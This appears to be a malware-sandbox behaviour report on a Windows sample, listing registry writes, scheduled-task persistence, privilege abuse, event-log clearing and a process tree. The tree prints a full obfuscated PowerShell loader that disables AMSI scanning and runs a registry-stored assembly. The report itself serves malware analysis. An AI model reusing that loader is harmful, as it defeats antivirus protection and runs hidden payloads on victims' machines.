\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 44003100000000002d5a248d10006100340009000400efbe2d5a0b8d2d5a248d2e000000b1610400000029000000000000000000000000000000a99061006100000010000000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2516 PING.EXE 5600 PING.EXE 6988 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1144 schtasks.exe 7796 schtasks.exe 6568 schtasks.exe 3184 SCHTASKS.exe 7400 schtasks.exe 5152 schtasks.exe 3936 schtasks.exe 8120 schtasks.exe 9188 schtasks.exe 7588 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4236 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 468 chrome.exe 468 chrome.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3324 build.exe 3240 gem1.exe 3240 gem1.exe 5572 gem2.exe 1316 powershell.exe 1316 powershell.exe 1316 powershell.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5572 gem2.exe 5692 dialer.exe 5692 dialer.exe 5572 gem2.exe 5572 gem2.exe 5692 dialer.exe 5572 gem2.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 6932 Lightshot.exe 5692 dialer.exe 5692 dialer.exe 6956 powershell.exe 6956 powershell.exe 5692 dialer.exe 5692 dialer.exe 6956 powershell.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe 5692 dialer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 756 7zFM.exe Token: 35 756 7zFM.exe Token: SeSecurityPrivilege 756 7zFM.exe Token: SeDebugPrivilege 1832 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 2136 voidware_loader.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeDebugPrivilege 4332 DirectX111.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeShutdownPrivilege 468 chrome.exe Token: SeCreatePagefilePrivilege 468 chrome.exe Token: SeDebugPrivilege 3324 build.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 3240 gem1.exe Token: SeImpersonatePrivilege 3240 gem1.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 4652 firefox.exe Token: SeDebugPrivilege 388 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeIncreaseQuotaPrivilege 1316 powershell.exe Token: SeSecurityPrivilege 1316 powershell.exe Token: SeTakeOwnershipPrivilege 1316 powershell.exe Token: SeLoadDriverPrivilege 1316 powershell.exe Token: SeSystemProfilePrivilege 1316 powershell.exe Token: SeSystemtimePrivilege 1316 powershell.exe Token: SeProfSingleProcessPrivilege 1316 powershell.exe Token: SeIncBasePriorityPrivilege 1316 powershell.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
pid Process 756 7zFM.exe 756 7zFM.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe -
Suspicious use of SendNotifyMessage 44 IoCs
pid Process 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 468 chrome.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4236 EXCEL.EXE 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe 4652 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1428 wrote to memory of 1832 1428 New Text Document mod.exe 84 PID 1428 wrote to memory of 1832 1428 New Text Document mod.exe 84 PID 1428 wrote to memory of 1668 1428 New Text Document mod.exe 86 PID 1428 wrote to memory of 1668 1428 New Text Document mod.exe 86 PID 1428 wrote to memory of 1668 1428 New Text Document mod.exe 86 PID 468 wrote to memory of 3556 468 chrome.exe 95 PID 468 wrote to memory of 3556 468 chrome.exe 95 PID 1832 wrote to memory of 2136 1832 ._cache_New Text Document mod.exe 96 PID 1832 wrote to memory of 2136 1832 ._cache_New Text Document mod.exe 96 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 1212 468 chrome.exe 97 PID 468 wrote to memory of 4400 468 chrome.exe 98 PID 468 wrote to memory of 4400 468 chrome.exe 98 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 PID 468 wrote to memory of 4664 468 chrome.exe 99 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 687 curl/8.7.1 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1076
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{daedd76b-2bd7-4321-b781-352feb9b8f6b}2⤵PID:4112
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1276
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:dftHHpuOwqrk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JXENHFhsWNMmCP,[Parameter(Position=1)][Type]$AZlJKzATGJ)$qfIxlMqdHlF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+'c'+''+'t'+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nMem'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+'u'+'le',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+','+[Char](80)+'ub'+'l'+'i'+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$qfIxlMqdHlF.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+'l'+'N'+'a'+'m'+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$JXENHFhsWNMmCP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$qfIxlMqdHlF.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+[Char](105)+'g'+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$AZlJKzATGJ,$JXENHFhsWNMmCP).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'Ma'+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $qfIxlMqdHlF.CreateType();}$VevXusRHcEqky=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+''+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'Un'+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+'ti'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+'s');$hdimTdFMdImlkY=$VevXusRHcEqky.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YAgzTOWygDyyPaCsjte=dftHHpuOwqrk @([String])([IntPtr]);$RZECMrGTbKHMENsGwlkGAP=dftHHpuOwqrk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xsaHCteqTRI=$VevXusRHcEqky.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$yfBQKgnzzHKYbR=$hdimTdFMdImlkY.Invoke($Null,@([Object]$xsaHCteqTRI,[Object]('L'+'o'+''+'a'+'dLi'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$rGnlYTlHqpcSDyRHP=$hdimTdFMdImlkY.Invoke($Null,@([Object]$xsaHCteqTRI,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'lP'+'r'+'otec'+[Char](116)+'')));$oqvfjqq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfBQKgnzzHKYbR,$YAgzTOWygDyyPaCsjte).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$LfDiYnmHCtufAvuPx=$hdimTdFMdImlkY.Invoke($Null,@([Object]$oqvfjqq,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+'u'+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$PlPERuTjDF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rGnlYTlHqpcSDyRHP,$RZECMrGTbKHMENsGwlkGAP).Invoke($LfDiYnmHCtufAvuPx,[uint32]8,4,[ref]$PlPERuTjDF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LfDiYnmHCtufAvuPx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rGnlYTlHqpcSDyRHP,$RZECMrGTbKHMENsGwlkGAP).Invoke($LfDiYnmHCtufAvuPx,[uint32]8,0x20,[ref]$PlPERuTjDF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+'A'+[Char](82)+'E').GetValue(''+'$'+''+[Char](76)+''+[Char](77)+''+[Char](88)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
PID:8668
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1604
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2988
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2316
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2636
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2496
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3280
-
